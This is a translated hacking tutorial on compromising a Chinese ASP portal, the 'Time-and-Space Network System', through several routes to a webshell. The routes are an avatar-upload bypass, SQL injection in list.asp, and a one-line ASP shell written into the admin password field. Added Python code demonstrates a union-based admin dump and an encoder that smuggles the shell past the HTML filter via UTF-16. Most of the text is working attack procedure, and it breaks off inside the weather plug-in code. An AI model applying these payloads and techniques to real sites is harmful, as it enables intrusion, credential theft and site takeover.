Author: Shu Cheng Li Yin♂[Dream]★Swordsman]
Recently a vulnerability was found in Dvbbs 8.0 (the "mobile network" forum), so I fired up Internet Explorer and went to the Dvbbs official site to see whether a patch was out. After a look around I found no patch, but I happened to notice a "Time-and-Space Network System" in the download rankings, advertised as the preferred program for building local portal websites. So I downloaded it to study it.
Cracking the security defenses
Once I had the program I started with black-box testing. Adding a single quotation mark to a parameter popped up a dialog box, as shown in figure 1, so there was evidently an anti-injection script. I tried many links and every test was intercepted. With no way forward from the outside, let's look at the code. Open news_view.asp and you see the following at a glance:
Figure 1
<%
Dim id
id = Trim(Request.QueryString("id"))
If Not IsNumeric(id) Then
    Call format_redirect("news.asp")
End If
%>
This code reads the client-supplied id from the query string (GET) and checks it with IsNumeric: a non-numeric id is redirected to news.asp and never reaches a query. Next the file includes <!-- #include file="include/jk_review.asp" -->, a file taken over from the Joekoe (Qiao ke) system. Joekoe is best known for its upload vulnerability; set that aside for the moment and look first at where the anti-injection code lives. After some searching I finally found safe.asp, which is called by many files, as shown in figure 2.
Figure 2
This file contains no replacement-style filter function. It only calls Instr, which returns the position of the first occurrence of a substring, to look for blacklisted strings in submitted values, and pops up a dialog when the client browser submits one of them. Most of the variables are additionally checked with IsNumeric and CInt. The Joekoe code base is large, and after some time I still had found no breakthrough, so let's look at the backend, as shown in figure 3.
Figure 3
I didn't expect the backend to have the same authentication code as Dvbbs, and there was nothing I could do about it. Logging in with the default account, password and authentication code, I found the system very powerful: in the backend upload settings one can add cer to the allowed extensions (IIS maps .cer to the ASP script engine by default) and then obtain a WebShell through the frontend upload. But the authentication code cannot be cracked; it is stored in include/common.asp, so the path to a backend WebShell is completely blocked. Given that Joekoe has a history of upload vulnerabilities, check whether this system has the same problem. As everyone knows, the Joekoe upload vulnerability comes mainly from lax suffix filtering, so let's experiment.
To upload a file you must first register a user, so I registered ahhacker86 and entered the user center. The "publish information" item on the left allows image uploads, as shown in figure 4. That is easy to handle: start WSockExpert to capture packets, click to upload an image, and quickly capture the cookies. Then use the Domain 3.6 client upload tool with those cookies to upload the file. "Upload successful!" appears soon enough, but the result is disappointing: the uploaded file's suffix was changed to gif, so the one-line shell cannot run, as shown in figure 5.
Figure 4
Figure 5
So the upload here can't be used. Then I found another upload point: the user profile modification function, which can upload an avatar. Start WSockExpert again to capture packets, grab the cookies, and upload with Domain 3.6 once more. This time there was no "upload successful" prompt, and I was about to try again, wondering whether the program had fixed the upload vulnerability after all. With that question in mind I opened http://localhost/upload/other/DIY.asp and was delighted to see the familiar interface: the one-line shell had uploaded successfully, as shown in figure 6. Everyone knows what to do from there. So a WebShell on this system is in hand, but the method is cumbersome: do you really have to register a user and capture packets every time?
Figure 6
Sidenote in the narrow sense: getting a WebShell
Do you know what the "sidenote" in the narrow sense is? In our daily intrusions, if the target site cannot be taken directly, we break into another site on the same server and escalate privileges to reach the target site; that is the sidenote in the broad sense. Similarly, if a website itself is secure but runs Dvbbs 6.0 as its BBS, don't count on its security. This program has a similar problem: the main program is too large, and a lot of its bundled scripts were written without security fully in mind, which gives us an opening. Enough talk, on to the point. The program has a "joke" category column, and its home page has an injection vulnerability. The following is the code of list.asp.
<%
id = Request("id")
If id = "" Then
    Response.Write "Insufficient parameters"
    Response.End
End If
%>
<!-- #include file="conn.asp" -->
<%
sql = "select * from learning where articleid=" & id
rs.Open sql, conn, 1, 2
If rs.BOF Or rs.EOF Then
    Response.Write "The content has been deleted or does not exist"
    rs.Close
    Set rs = Nothing
    conn.Close
    Set conn = Nothing
    Response.End
End If
rs("hits") = rs("hits") + 1
rs.Update
%>
The variable id is taken from the client (Request without a collection name, so it can come from the query string, the form or a cookie) and saved as id; a recordset is then opened on the database and the SQL query run. Because id is not filtered it is concatenated straight into the query, which makes exploitation easy: point the Ah D injection tool at it and the admin account and password are guessed out quickly. The backend of this column also has problems. Because it is fairly hidden, administrators rarely notice it, and the default account still works, as shown in figure 7.
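The contrast between news_view.asp (IsNumeric guard) and list.asp (raw concatenation), as an added example that is not code from the Time-and-Space Network System. It is a Python/sqlite3 simulation: the `admin` table, its columns and the sample rows are constructed assumptions, and Jet/Access syntax differs from sqlite, so it shows the mechanism an injection tool such as Ah D relies on rather than a literal payload for the target.

```python
# Added example (not code from the page or the program it describes): sqlite3
# simulation of the list.asp and news_view.asp query patterns.
import re
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: two 'learning' articles and one admin account.
    The admin table is an assumption standing in for whatever the real schema has."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE learning (articleid INTEGER, title TEXT, hits INTEGER);
        INSERT INTO learning VALUES (1, 'first joke', 10), (2, 'second joke', 3);
        CREATE TABLE admin (id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 'sample-password');
        """
    )
    return conn


def run_sql(sql: str) -> list:
    """Run one statement against a fresh sample database and return all rows."""
    conn = make_db()
    try:
        return conn.execute(sql).fetchall()
    finally:
        conn.close()


def list_asp_query(id_param: str) -> list:
    """list.asp pattern: id = Request("id") is concatenated into the SQL unchecked."""
    return run_sql("select * from learning where articleid=" + id_param)


def is_numeric(value: str) -> bool:
    """Strict stand-in for VBScript IsNumeric (which accepts a few more forms, such
    as exponents); the point is that nothing able to carry SQL gets through."""
    return re.fullmatch(r"\s*[+-]?\d+(\.\d+)?\s*", value) is not None


def news_view_asp_query(id_param: str):
    """news_view.asp pattern: reject before the value reaches a query.
    Returns None where the ASP would redirect to news.asp instead."""
    if not is_numeric(id_param):
        return None
    return list_asp_query(id_param.strip())


def boolean_probe(base_id: str) -> bool:
    """The first check an injection tool runs: does appending a true and a false
    condition change the result set? If so, the parameter is injectable."""
    truthy = list_asp_query(base_id + " and 1=1")
    falsy = list_asp_query(base_id + " and 1=2")
    return bool(truthy) and not falsy


def dump_admin_via_union() -> list:
    """Union-based read of the admin table through the unfiltered id (column
    counts must match, which is why learning and admin both have three here)."""
    return list_asp_query("0 union select id, username, password from admin")


if __name__ == "__main__":
    print("injectable:", boolean_probe("1"))
    print("admin rows:", dump_admin_via_union())
    print("guarded:", news_view_asp_query("1 and 1=1"))
```

Against the real target the tool guesses the account and password character by character from the true/false difference rather than reading them with a union, but the decision it makes is the one `boolean_probe` makes.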
Figure 7
The backend is very concise. If I'm not mistaken, the database file carries an .asp suffix, and what's more there is no anti-download table (a table holding a deliberately malformed <% sequence that makes the ASP parser error out before any injected code runs). So we should be able to add a one-line shell through the backend. But my test proved me wrong: neither the content nor the title field would take the trojan; the one-line shell <% execute request("value") %> was filtered. Checking the source again in a hurry, I found a segment of filtering code, as follows.
<%
' Fragment as found in the source; the entity names that extraction had
' un-escaped are restored and the closing statements are added. l is taken
' to be Len(str), set before this fragment.
Dim i
For i = 1 To l
    Select Case Mid(str, i, 1)
        Case "<"
            result = result + "&lt;"
        Case ">"
            result = result + "&gt;"
        Case Chr(13)
            result = result + "<br>"
        Case Chr(34)
            result = result + "&quot;"
        Case "&"
            result = result + "&amp;"
        Case Chr(32)
            result = result + "&nbsp;"
    End Select
Next
%>
This code entity-encodes the key HTML characters, so no wonder the one-line shell was never stored: the leading < becomes &lt; and the ASP parser never sees a <%. Inserting a shell through this path is hard, so change the place. In general systems there is one spot that is never filtered: the backend admin password modification.
The backend password modification and column category management share one file, changpass.asp; the code is as follows.
If Request("method") = "chan" Then
    If Request("change") = "modify" Then
        rs.Open "select * from admin where id=" + Request("id"), conn, 1, 3
        rs("username") = Request("name")
        rs("password") = Request("pass")
        rs.Update
        rs.Close
    End If
End If
This code modifies the administrator username and password and writes them into the database directly, without any filtering function (note that the id is concatenated into the query just as unfiltered), so our one-line shell can be written in. Likewise, category modification is written without processing. But after writing the classic <% execute request("value") %>, what came back was figure 8. Speechless. That form evidently won't do, so I had to rely on the "encrypted" one-line shell. The page of the error is not reproduced here; a common cause is that Jet stores text columns as UTF-16LE, so the bytes on disk are "<", NUL, "%", NUL and so on rather than a contiguous <%, and the ASP parser, which reads the .asp file byte by byte, never finds its delimiter. The "encrypted" shell is the usual workaround: a string whose UTF-16LE encoding, read byte-wise, is the ASCII shell. After encoding it, the shell went in ("batch data inserted into the database successfully"), and connecting to the database address http://localhost/xiaohua.asp gave the WebShell, as shown in figure 9. So the WebShell is obtained a second time, simply and easily, with no registration or packet capture needed.
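Both the filter above and the storage detail behind the "encrypted" shell, as one added example that is not code from the page or the program. It ports the Select Case filter to Python, then shows what a UTF-16LE text column contributes to an .asp-suffixed database file and what the ASP parser would find there. Two assumptions, not stated on the page: that the database stores text as UTF-16LE without Unicode compression, and that "encrypted" means the usual UTF-16 form of the shell. The last function is an audit helper a defender can run over a database file served under an executable extension.

```python
# Added example (not the program's own code). Assumes UTF-16LE text storage and
# that the "encrypted" shell is the UTF-16 reinterpretation of the ASCII one.

ONE_LINE_SHELL = '<%execute request("value")%>'


def html_filter(text: str) -> str:
    """Port of the page's Select Case filter: entity-encodes < > " & and space,
    and turns a carriage return into <br>."""
    table = {
        "<": "&lt;",
        ">": "&gt;",
        "\r": "<br>",
        '"': "&quot;",
        "&": "&amp;",
        " ": "&nbsp;",
    }
    return "".join(table.get(ch, ch) for ch in text)


def jet_text_bytes(value: str) -> bytes:
    """Bytes a UTF-16LE text column contributes to the database file (assumption)."""
    return value.encode("utf-16-le")


def has_executable_asp_block(data: bytes) -> bool:
    """What matters when the database file is requested as .asp: a literal '<%'
    followed later by '%>' in the raw bytes."""
    start = data.find(b"<%")
    return start != -1 and data.find(b"%>", start + 2) != -1


def utf16_smuggle(shell: str) -> str:
    """Build the 'encrypted' shell: pad to an even byte count, then reinterpret the
    ASCII bytes as UTF-16LE code units, so that storing the result as UTF-16LE
    writes the original ASCII bytes to disk."""
    raw = shell.encode("ascii")
    if len(raw) % 2:
        raw += b" "  # trailing space lands after %> and is harmless
    return raw.decode("utf-16-le")


def asp_blocks_in_file(data: bytes) -> list:
    """Audit helper: every <% ... %> block an ASP-mapped extension would execute."""
    blocks = []
    pos = 0
    while True:
        start = data.find(b"<%", pos)
        if start == -1:
            return blocks
        end = data.find(b"%>", start + 2)
        if end == -1:
            return blocks
        blocks.append(data[start:end + 2])
        pos = end + 2


if __name__ == "__main__":
    print("filtered:", html_filter(ONE_LINE_SHELL))
    print("plain insert executable:", has_executable_asp_block(jet_text_bytes(ONE_LINE_SHELL)))
    encoded = utf16_smuggle(ONE_LINE_SHELL)
    print("encoded insert executable:", has_executable_asp_block(jet_text_bytes(encoded)))
```

`asp_blocks_in_file` searches the raw bytes only, because that is how IIS reads the file; a scanner that decodes the file as text first would miss exactly the case the page exploits.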
Figure 8
Figure 9
A thorough revolution for the Time-and-Space Network System
The two methods above are enough to bring the system down, but what if the administrator has fixed both? In a later intrusion I ran into exactly that situation, with neither method available. In fact there is a simpler method still: the "Weather" column is a plug-in that also has a vulnerability, caused mainly by an insecure database. The database file of this column is weatherdb.asp, and its connection file reads as follows:
<%
Dim conn
Dim connstr
Dim db
db = "weatherdb.asp"
Set conn = Server.CreateObject("ADODB.Connection")
connstr = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=" & Server.MapPath("" & db & "")
conn.Open connstr
%>
There is no error handling at all (no On Error Resume Next), which gives a database path disclosure vulnerability: when the open fails, the ADO error page prints the physical path of the database. This is the classic %5c trick: replace the last / in the URL with %5c, IIS decodes it to a backslash, the relative path no longer resolves, and the Jet error message names the full path of the file it could not find. So even if the administrator is a bit security-aware and renames the default database, we can use this to recover the database path, which is really perfect. add.asp then contains the following code:
<%
Set rs = Server.CreateObject("ADODB.Recordset")
sql = "select * from weather"
rs.Open sql, conn, 1, 3
rs.AddNew
rs("addresname") = Request("addresname")
rs("url") = Request("url")
rs("Addtime") = Now()
rs.Update
rs.Close
Set rs = Nothing
%>